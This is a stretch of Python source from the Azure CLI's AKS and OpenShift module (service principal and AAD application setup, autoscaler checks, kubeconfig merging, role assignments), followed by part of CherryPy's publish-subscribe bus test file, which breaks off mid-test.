        service_principal, aad_session_key = _build_service_principal(
            rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # We don't need to add role assignment for this created SPN
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
        'aad_session_key': aad_session_key,
    }
def _ensure_osa_aad(cmd,
                    cli_ctx,
                    aad_client_app_id=None,
                    aad_client_app_secret=None,
                    aad_tenant_id=None,
                    identifier=None,
                    name=None, create=False,
                    customer_admin_group_id=None):
    """Build the AAD identity provider config for an OpenShift managed cluster.

    When ``create`` is True, finds-or-creates the AAD application (matched by
    its identifier URI) and updates its reply URL with the cluster FQDN.
    Falls back to the login tenant when no tenant ID is supplied. Returns an
    OpenShiftManagedClusterAADIdentityProvider model.
    """
    OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
                                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                                operation_group='open_shift_managed_clusters')
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if create:
        # This reply_url is temporary set since Azure need one to create the AAD.
        app_id_name = 'https://{}'.format(name)
        if not aad_client_app_secret:
            aad_client_app_secret = _create_client_secret()

        # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
        resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
                                         additional_properties=None, type="Scope")
        # Read directory permissions on Windows Azure Active Directory API
        directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
                                          additional_properties=None, type="Role")

        required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
                                                         additional_properties=None,
                                                         resource_app_id="00000002-0000-0000-c000-000000000000")

        # Look for an existing app registration with this identifier URI.
        list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
                                                               .format(app_id_name)))
        if list_aad_filtered:
            aad_client_app_id = list_aad_filtered[0].app_id
            # Updating reply_url with the correct FQDN information returned by the RP
            reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
                identifier)
            update_application(client=rbac_client.applications,
                               object_id=list_aad_filtered[0].object_id,
                               display_name=name,
                               identifier_uris=[app_id_name],
                               reply_urls=[reply_url],
                               homepage=app_id_name,
                               password=aad_client_app_secret,
                               required_resource_accesses=[required_osa_aad_access])
            logger.info('Updated AAD: %s', aad_client_app_id)
        else:
            result, _aad_session_key = create_application(client=rbac_client.applications,
                                                          display_name=name,
                                                          identifier_uris=[
                                                              app_id_name],
                                                          homepage=app_id_name,
                                                          password=aad_client_app_secret,
                                                          required_resource_accesses=[required_osa_aad_access])
            aad_client_app_id = result.app_id
            logger.info('Created an AAD: %s', aad_client_app_id)
        # Get the TenantID
        if aad_tenant_id is None:
            profile = Profile(cli_ctx=cli_ctx)
            _, _, aad_tenant_id = profile.get_login_credentials()
    return OpenShiftManagedClusterAADIdentityProvider(
        client_id=aad_client_app_id,
        secret=aad_client_app_secret,
        tenant_id=aad_tenant_id,
        kind='AADIdentityProvider',
        customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
                              service_principal=None,
                              client_secret=None,
                              subscription_id=None,
                              dns_name_prefix=None,
                              location=None,
                              name=None):
    """Return a dict with 'client_secret' and 'service_principal', creating a
    service principal (and a secret) when the caller did not supply one.

    Raises CLIError when SP creation fails outright, or when
    --service-principal is given without --client-secret.
    """
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if service_principal:
        # --service-principal specified: the matching secret is mandatory.
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    else:
        # No SP supplied: mint a secret if needed and create a fresh SP.
        if not client_secret:
            client_secret = _create_client_secret()
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
            salt, dns_name_prefix, location)
        service_principal, _aad_session_key = _build_service_principal(
            rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # Grant the role before handing the SP back to the caller.
        if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
            logger.warning('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
    }
def _create_client_secret():
    """Generate a 21-character AAD client secret.

    20 random hex characters plus a trailing '$' so the value satisfies
    AAD's special-character requirement for SP secrets.
    """
    random_hex = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
    # Add a special character to satisfy AAD SP secret requirements
    return random_hex + '$'
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the Azure location of *resource_group_name*.

    The get() call doubles as an existence check: it errors out when the
    resource group does not exist.
    """
    groups_client = cf_resource_groups(ctx, subscription_id=subscription_id)
    return groups_client.get(resource_group_name).location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
                                   min_count,
                                   max_count,
                                   node_count,
                                   agent_pool_profile):
    """Validate autoscaler arguments and stamp them onto the agent pool.

    When the autoscaler is enabled, min/max must both be present, ordered,
    and bracket node_count; the profile is then updated in place.  When it
    is disabled, supplying min/max is an error.  Raises CLIError on any
    violation.
    """
    if not enable_cluster_autoscaler:
        # min/max only make sense together with the autoscaler flag.
        if min_count is not None or max_count is not None:
            raise CLIError(
                'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
        return
    if min_count is None or max_count is None:
        raise CLIError(
            'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
    lo, hi = int(min_count), int(max_count)
    if lo > hi:
        raise CLIError(
            'Value of min-count should be less than or equal to value of max-count')
    if not lo <= int(node_count) <= hi:
        raise CLIError(
            'node-count is not in the range of min-count and max-count')
    agent_pool_profile.min_count = lo
    agent_pool_profile.max_count = hi
    agent_pool_profile.enable_auto_scaling = True
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
    """
    Validate the min and max node counts for an autoscaler update.

    Raises CLIError when an enable/update operation is missing either bound,
    or when both bounds are present but out of order.
    """
    missing_a_bound = min_count is None or max_count is None
    if missing_a_bound:
        if is_enable_or_update:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
        return
    if int(min_count) > int(max_count):
        raise CLIError(
            'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # A concurrent creation of the directory is fine; re-raise anything else.
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # Create the file with 0600 permissions: kubeconfigs hold credentials.
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one:
    # write the incoming kubeconfig to a temp file first, then merge from it.
    fd, temp_path = tempfile.mkstemp()
    additional_file = os.fdopen(fd, 'w+t')
    try:
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(
            path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        # Best effort: a malformed config is reported, not fatal.
        logger.warning(
            'Failed to merge credentials to kube config file: %s', ex)
    finally:
        # Always close and remove the temp file, even on failure.
        additional_file.close()
        os.remove(temp_path)
def _remove_nulls(managed_clusters):
    """
    Strip often-empty fields from each ManagedCluster in *managed_clusters*
    so the JSON representation is not littered with null values.

    This works around a quirk of the SDK for python behavior: these fields
    are not sent by the server, but get recreated by the CLI's own
    "to_dict" serialization.  Returns the same list, mutated in place.
    """
    cluster_attrs = ['tags']
    pool_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
    spn_attrs = ['secret']

    def _drop_none(obj, names):
        # Delete each listed attribute whose value is None.
        for attr_name in names:
            if getattr(obj, attr_name, None) is None:
                delattr(obj, attr_name)

    for cluster in managed_clusters:
        _drop_none(cluster, cluster_attrs)
        if cluster.agent_pool_profiles is not None:
            for pool_profile in cluster.agent_pool_profiles:
                _drop_none(pool_profile, pool_attrs)
        _drop_none(cluster.service_principal_profile, spn_attrs)
    return managed_clusters
def _remove_osa_nulls(managed_clusters):
    """
    Strip often-empty fields from each OpenShift ManagedCluster so the JSON
    representation doesn't contain distracting null fields.

    This works around a quirk of the SDK for python behavior: these fields
    are not sent by the server, but get recreated by the CLI's own
    "to_dict" serialization.  Returns the same list, mutated in place.
    """
    attrs = ['tags', 'plan', 'type', 'id']
    ap_master_attrs = ['name', 'os_type']
    net_attrs = ['peer_vnet_id']

    def _drop_none(obj, names):
        # Delete attributes that exist AND are None.  The hasattr guard keeps
        # this safe for models that omit an attribute entirely; the previous
        # pool/net loops used getattr(obj, attr, None) and would raise
        # AttributeError from delattr in that case.
        for attr in names:
            if hasattr(obj, attr) and getattr(obj, attr) is None:
                delattr(obj, attr)

    for managed_cluster in managed_clusters:
        _drop_none(managed_cluster, attrs)
        _drop_none(managed_cluster.master_pool_profile, ap_master_attrs)
        _drop_none(managed_cluster.network_profile, net_attrs)
    return managed_clusters
def _validate_aci_location(norm_location):
    """
    Validate that Azure Container Instances is offered in *norm_location*.

    Raises CLIError listing the supported regions otherwise.
    """
    # Keep the ordering: it is reproduced verbatim in the error message.
    supported_locations = [
        "australiaeast", "canadacentral", "centralindia", "centralus",
        "eastasia", "eastus", "eastus2", "eastus2euap", "japaneast",
        "northcentralus", "northeurope", "southcentralus", "southeastasia",
        "southindia", "uksouth", "westcentralus", "westus", "westus2",
        "westeurope",
    ]
    if norm_location in supported_locations:
        return
    raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
                   ' The available locations are "{}"'.format(','.join(supported_locations)))
def osa_list(cmd, client, resource_group_name=None):
    """List OpenShift managed clusters, optionally scoped to one resource
    group, with noisy null fields stripped from each result."""
    source = (client.list_by_resource_group(resource_group_name)
              if resource_group_name else client.list())
    return _remove_osa_nulls(list(source))
def _format_workspace_id(workspace_id):
    """Normalize a Log Analytics workspace resource id.

    Trims surrounding whitespace, ensures a leading '/', and drops any
    trailing slashes.
    """
    normalized = workspace_id.strip()
    if not normalized.startswith('/'):
        normalized = '/' + normalized
    # rstrip is a no-op when there is no trailing slash.
    return normalized.rstrip('/')
def openshift_create(cmd, client, resource_group_name, name,  # pylint: disable=too-many-locals
                     location=None,
                     compute_vm_size="Standard_D4s_v3",
                     compute_count=3,
                     aad_client_app_id=None,
                     aad_client_app_secret=None,
                     aad_tenant_id=None,
                     vnet_prefix="10.0.0.0/8",
                     subnet_prefix="10.0.0.0/24",
                     vnet_peer=None,
                     tags=None,
                     no_wait=False,
                     workspace_id=None,
                     customer_admin_group_id=None):
    """Create an OpenShift on Azure (OSA v3.11) managed cluster.

    Builds compute/infra/master agent pool profiles, wires up an AAD
    identity provider (creating the AAD app when none of the aad_* args is
    supplied and the cluster does not exist yet), optionally enables Log
    Analytics monitoring and VNet peering, submits the cluster, then
    re-runs the AAD setup with the cluster's real public hostname.
    Raises CLIError when the subscription is not enabled for the service.
    """
    # Resolve the SDK model classes against the loaded API version.
    OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
                                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                             operation_group='open_shift_managed_clusters')
    OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
                                                   resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                   operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
                                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                             operation_group='open_shift_managed_clusters')
    OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                             operation_group='open_shift_managed_clusters')
    OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
                                            resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                            operation_group='open_shift_managed_clusters')
    NetworkProfile = cmd.get_models('NetworkProfile',
                                    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                    operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
                                                        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                        operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    # Default the cluster location to the resource group's location.
    if location is None:
        location = get_rg_location(cmd.cli_ctx, resource_group_name)
    agent_pool_profiles = []
    agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='compute',  # Must be 12 chars or less before ACS RP adds to it
        count=int(compute_count),
        vm_size=compute_vm_size,
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.compute,
        subnet_cidr=subnet_prefix
    )
    agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='infra',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.infra,
        subnet_cidr=subnet_prefix
    )
    agent_pool_profiles.append(agent_node_pool_profile)
    agent_pool_profiles.append(agent_infra_pool_profile)
    agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='master',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        subnet_cidr=subnet_prefix
    )
    identity_providers = []
    create_aad = False
    # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
    try:
        client.get(resource_group_name, name)
    except CloudError:
        # Cluster does not exist yet: a brand-new AAD app may be created.
        # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
        if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
            create_aad = True
    osa_aad_identity = _ensure_osa_aad(cmd,
                                       cmd.cli_ctx,
                                       aad_client_app_id=aad_client_app_id,
                                       aad_client_app_secret=aad_client_app_secret,
                                       aad_tenant_id=aad_tenant_id, identifier=None,
                                       name=name, create=create_aad,
                                       customer_admin_group_id=customer_admin_group_id)
    identity_providers.append(
        OpenShiftManagedClusterIdentityProvider(
            name='Azure AD',
            provider=osa_aad_identity
        )
    )
    auth_profile = OpenShiftManagedClusterAuthProfile(
        identity_providers=identity_providers)
    default_router_profile = OpenShiftRouterProfile(name='default')
    # Normalize a bare VNet name into a full resource id for peering.
    if vnet_peer is not None:
        from msrestazure.tools import is_valid_resource_id, resource_id
        if not is_valid_resource_id(vnet_peer):
            vnet_peer = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Network', type='virtualNetwork',
                name=vnet_peer
            )
    # Monitoring is enabled only when a workspace id was supplied.
    if workspace_id is not None:
        workspace_id = _format_workspace_id(workspace_id)
        monitor_profile = OpenShiftManagedClusterMonitorProfile(
            enabled=True, workspace_resource_id=workspace_id)  # pylint: disable=line-too-long
    else:
        monitor_profile = None
    network_profile = NetworkProfile(
        vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
    osamc = OpenShiftManagedCluster(
        location=location, tags=tags,
        open_shift_version="v3.11",
        network_profile=network_profile,
        auth_profile=auth_profile,
        agent_pool_profiles=agent_pool_profiles,
        master_pool_profile=agent_master_pool_profile,
        router_profiles=[default_router_profile],
        monitor_profile=monitor_profile)
    try:
        # long_running_operation_timeout=300
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
        result = LongRunningOperation(cmd.cli_ctx)(result)
        instance = client.get(resource_group_name, name)
        # Re-run the AAD setup with the cluster's real public hostname so the
        # AAD app's reply URL points at the deployed cluster.
        _ensure_osa_aad(cmd,
                        cmd.cli_ctx,
                        aad_client_app_id=osa_aad_identity.client_id,
                        aad_client_app_secret=osa_aad_identity.secret,
                        aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
                        name=name, create=create_aad)
    except CloudError as ex:
        # Both messages indicate the subscription is not enabled for OSA.
        if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
            raise CLIError(
                'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        if "No registered resource provider found for location" in ex.message:
            raise CLIError(
                'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        raise ex
def openshift_show(cmd, client, resource_group_name, name):
    """Show an OpenShift managed cluster with noisy null fields stripped."""
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    managed_cluster = client.get(resource_group_name, name)
    return _remove_osa_nulls([managed_cluster])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
    """Scale the 'compute' agent pool of an OSA cluster to *compute_count*.

    Returns the result of the create-or-update call (a poller, or the raw
    request when no_wait is set).
    """
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # TODO: change this approach when we support multiple agent pools.
    # Locate the 'compute' pool with enumerate/next instead of the old
    # range(len(...)) index loop; fall back to index 0 when absent,
    # mirroring the original default.
    idx = next((i for i, profile in enumerate(instance.agent_pool_profiles)
                if profile.name.lower() == "compute"), 0)
    instance.agent_pool_profiles[idx].count = int(compute_count)  # pylint: disable=no-member
    # null out the AAD profile and add manually the masterAP name because otherwise validation complains
    instance.master_pool_profile.name = "master"
    instance.auth_profile = None
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
    """Enable Log Analytics monitoring on an OSA cluster and submit the update."""
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # Normalize the workspace id and attach an enabled monitor profile.
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=True,
        workspace_resource_id=_format_workspace_id(workspace_id))
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
    """Disable Log Analytics monitoring on an OSA cluster and submit the update."""
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # A disabled profile with no workspace replaces whatever was there.
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=False,
        workspace_resource_id=None)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
    """Return True when the cluster uses a managed identity (system- or
    user-assigned).

    Always returns a bool; the original boolean expression leaked falsy
    non-bool values (None / empty identity) to callers.
    """
    if not (managed_cluster and managed_cluster.identity):
        return False
    return managed_cluster.identity.type.casefold() in ("systemassigned", "userassigned")
def _put_managed_cluster_ensuring_permission(
        cmd,  # pylint: disable=too-many-locals,too-many-statements,too-many-branches
        client,
        subscription_id,
        resource_group_name,
        name,
        managed_cluster,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        need_grant_vnet_permission_to_cluster_identity,
        vnet_subnet_id,
        enable_managed_identity,
        attach_acr,
        headers,
        no_wait
):
    """PUT the managed cluster and perform role assignments that can only
    happen after the cluster resource exists.

    When any addon (or the managed-identity + ACR combination) needs a
    post-create role assignment, the call waits for the LRO to finish so the
    resulting cluster object can be used; otherwise no_wait is honored.
    Returns the cluster (or the poller when no_wait applies).
    """
    # some addons require post cluster creation role assigment
    need_post_creation_role_assignment = (monitoring_addon_enabled or
                                          ingress_appgw_addon_enabled or
                                          (enable_managed_identity and attach_acr) or
                                          virtual_node_addon_enabled or
                                          need_grant_vnet_permission_to_cluster_identity)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if virtual_node_addon_enabled:
            add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
        if need_grant_vnet_permission_to_cluster_identity:
            # Best effort: warn rather than fail when the subnet role
            # assignment cannot be created.
            if not _create_role_assignment(cmd, 'Network Contributor',
                                           cluster.identity.principal_id, scope=vnet_subnet_id,
                                           resolve_assignee=False):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            if cluster.identity_profile is None or \
                    cluster.identity_profile["kubeletidentity"] is None:
                # Cluster is up but ACR attach is impossible without the
                # kubelet identity; tell the user how to finish manually.
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                kubelet_identity_object_id = cluster.identity_profile["kubeletidentity"].object_id
                _ensure_aks_acr(cmd,
                                assignee=kubelet_identity_object_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id,
                                is_service_principal=False)
    else:
        # No post-create work needed: submit and honor no_wait.
        cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              headers=headers)
    return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cmd, cluster_identity_object_id, scope):
    """Grant the cluster identity the Managed Identity Operator role on
    *scope* (the kubelet identity), unless an equivalent assignment already
    exists at exactly that scope.

    Raises UnauthorizedError when the role assignment cannot be created.
    """
    assignments_client = get_auth_management_client(cmd.cli_ctx, scope).role_assignments
    target_scope = scope.lower()
    target_principal = cluster_identity_object_id.lower()
    for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        already_assigned = (
            assignment.scope.lower() == target_scope and
            assignment.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID) and
            assignment.principal_id.lower() == target_principal)
        if already_assigned:
            # Nothing to do: the exact assignment is already in place.
            return
    if not _add_role_assignment(cmd, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
                                is_service_principal=False, scope=scope):
        raise UnauthorizedError('Could not grant Managed Identity Operator '
                                'permission to cluster identity at scope {}'.format(scope))
|
test_bus.py | """Publish-subscribe bus tests."""
# pylint: disable=redefined-outer-name
import os
import sys
import threading
import time
import unittest.mock
import pytest
from cherrypy.process import wspbus
CI_ON_MACOS = bool(os.getenv('CI')) and sys.platform == 'darwin'
msg = 'Listener %d on channel %s: %s.' # pylint: disable=invalid-name
@pytest.fixture
def bus():
    """Return a fresh wspbus.Bus instance for each test."""
    return wspbus.Bus()
@pytest.fixture
def log_tracker(bus):
    """Return an instance of bus log tracker."""
    class LogTracker:  # pylint: disable=too-few-public-methods
        """Bus log tracker."""
        # Class-level list; safe here because the class is re-created on
        # every fixture call, so entries are not shared between tests.
        log_entries = []
        def __init__(self, bus):
            # Record every message published on the bus's 'log' channel.
            def logit(msg, level):  # pylint: disable=unused-argument
                self.log_entries.append(msg)
            bus.subscribe('log', logit)
    return LogTracker(bus)
@pytest.fixture
def listener():
    """Return an instance of bus response tracker."""
    class _ResponseTracker:  # pylint: disable=too-few-public-methods
        """Record a formatted message for every listener invocation."""
        responses = []
        def get_listener(self, channel, index):
            """Return a listener that records (index, channel, arg) via *msg*."""
            def _record(arg=None):
                self.responses.append(msg % (index, channel, arg))
            return _record
    return _ResponseTracker()
def test_builtin_channels(bus, listener):
    """Test that built-in channels trigger corresponding listeners."""
    priorities = (100, 50, 0, 51)
    for channel in bus.listeners:
        for index, priority in enumerate(priorities):
            bus.subscribe(
                channel,
                listener.get_listener(channel, index),
                priority,
            )
    expected = []
    # Indices ordered by ascending priority: 0, 50, 51, 100.
    priority_order = (2, 1, 3, 0)
    for channel in bus.listeners:
        bus.publish(channel)
        expected += [msg % (i, channel, None) for i in priority_order]
        bus.publish(channel, arg=79347)
        expected += [msg % (i, channel, 79347) for i in priority_order]
    assert listener.responses == expected
def test_custom_channels(bus, listener):
    """Test that custom pub-sub channels work as built-in ones."""
    custom_listeners = ('hugh', 'louis', 'dewey')
    for channel in custom_listeners:
        for index, priority in enumerate((None, 10, 60, 40)):
            bus.subscribe(
                channel,
                listener.get_listener(channel, index),
                priority,
            )
    expected = []
    # Dispatch order by priority (None uses the bus default).
    priority_order = (1, 3, 0, 2)
    for channel in custom_listeners:
        bus.publish(channel, 'ah so')
        expected += [msg % (i, channel, 'ah so') for i in priority_order]
        bus.publish(channel)
        expected += [msg % (i, channel, None) for i in priority_order]
    assert listener.responses == expected
def test_listener_errors(bus, listener):
    """Test that unhandled exceptions raise channel failures."""
    channels = [c for c in bus.listeners if c != 'log']
    for channel in channels:
        bus.subscribe(channel, listener.get_listener(channel, 1))
        # A no-arg lambda breaks when the bus publishes with an argument.
        bus.subscribe(channel, lambda: None, priority=20)
    expected = []
    for channel in channels:
        with pytest.raises(wspbus.ChannelFailures):
            bus.publish(channel, 123)
        expected.append(msg % (1, channel, 123))
    assert listener.responses == expected
def test_start(bus, listener, log_tracker):
    """Test that bus start sequence calls all listeners."""
    num = 3
    for index in range(num):
        bus.subscribe('start', listener.get_listener('start', index))
    bus.start()
    try:
        # The start method MUST call all 'start' listeners (order not asserted).
        expected = {msg % (i, 'start', None) for i in range(num)}
        assert set(listener.responses) == expected
        # The start method MUST move the state to STARTED
        # (or EXITING, if errors occur)
        assert bus.state == bus.states.STARTED
        # The start method MUST log its states.
        assert log_tracker.log_entries == ['Bus STARTING', 'Bus STARTED']
    finally:
        # Exit so the atexit handler doesn't complain.
        bus.exit()
def test_stop(bus, listener, log_tracker):
    """Test that bus stop sequence calls all listeners."""
    num = 3
    for index in range(num):
        bus.subscribe('stop', listener.get_listener('stop', index))
    bus.stop()
    # The stop method MUST call all 'stop' listeners (order not asserted).
    expected = {msg % (i, 'stop', None) for i in range(num)}
    assert set(listener.responses) == expected
    # The stop method MUST move the state to STOPPED.
    assert bus.state == bus.states.STOPPED
    # The stop method MUST log its states.
    assert log_tracker.log_entries == ['Bus STOPPING', 'Bus STOPPED']
def test_graceful(bus, listener, log_tracker):
    """Test that bus graceful state triggers all listeners."""
    num = 3
    for index in range(num):
        bus.subscribe('graceful', listener.get_listener('graceful', index))
    bus.graceful()
    # The graceful method MUST call all 'graceful' listeners.
    expected = {msg % (i, 'graceful', None) for i in range(num)}
    assert set(listener.responses) == expected
    # The graceful method MUST log its states.
    assert log_tracker.log_entries == ['Bus graceful']
def test_exit(bus, listener, log_tracker):
    """Test that bus exit sequence is correct."""
    num = 3
    for index in range(num):
        bus.subscribe('stop', listener.get_listener('stop', index))
        bus.subscribe('exit', listener.get_listener('exit', index))
    bus.exit()
    # The exit method MUST call all 'stop' listeners,
    # and then all 'exit' listeners.
    expected = {msg % (i, channel, None)
                for channel in ('stop', 'exit')
                for i in range(num)}
    assert set(listener.responses) == expected
    # The exit method MUST move the state to EXITING.
    assert bus.state == bus.states.EXITING
    # The exit method MUST log its states.
    assert (log_tracker.log_entries ==
            ['Bus STOPPING', 'Bus STOPPED', 'Bus EXITING', 'Bus EXITED'])
def test_wait(bus):
    """Test that bus wait awaits for states."""
    def f(method):  # pylint: disable=invalid-name
        # Trigger the transition from another thread after a short delay,
        # so wait() below is already blocking when it happens.
        time.sleep(0.2)
        getattr(bus, method)()
    # (method to invoke, acceptable states for wait() to observe)
    flow = [
        ('start', [bus.states.STARTED]),
        ('stop', [bus.states.STOPPED]),
